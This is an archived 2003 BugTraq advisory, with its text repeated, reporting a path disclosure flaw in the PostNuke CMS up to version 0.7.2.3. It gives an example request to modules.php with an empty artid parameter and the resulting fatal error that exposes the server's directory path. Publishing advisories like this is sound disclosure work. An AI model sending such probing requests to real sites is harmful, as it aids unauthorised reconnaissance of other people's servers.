BugTraq
Back to list
|
Post reply
Postnuke: path disclosure (0.7.2.3 and prior)
May 28 2003 04:15AM
rkc (rkc uncompiled com)
Intro.
What is PostNuke ?
PostNuke is a weblog/Content Management System (CMS).
It is far more secure and stable than competing products.
Home Page: http://www.postnuke.com
&&
A vulnerability have been found in Postnuke (v0.7.2.3-Phoenix & prior)
which allow users to determine the physical path of this cms.
This vulnerability would allow a remote user to determine the full path to
the web root directory.
Example:
http://www.[target-website].com/modules.php?op=modload&name=Sections&fil
e=index&req=viewarticle&artid=
Error:
Fatal error: Call to a member function on a non-object in
/the/full/path/public_html/modules/Sections/index.php on line 238
Cheers,
rkc
--
Rep. Argentina
6765656B207374796C65
StFU, and RtFM !
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
What is PostNuke ?
PostNuke is a weblog/Content Management System (CMS).
It is far more secure and stable than competing products.
Home Page: http://www.postnuke.com
&&
A vulnerability have been found in Postnuke (v0.7.2.3-Phoenix & prior)
which allow users to determine the physical path of this cms.
This vulnerability would allow a remote user to determine the full path to
the web root directory.
Example:
http://www.[target-website].com/modules.php?op=modload&name=Sections&fil
e=index&req=viewarticle&artid=
Error:
Fatal error: Call to a member function on a non-object in
/the/full/path/public_html/modules/Sections/index.php on line 238
Cheers,
rkc
--
Rep. Argentina
6765656B207374796C65
StFU, and RtFM !
[ reply ]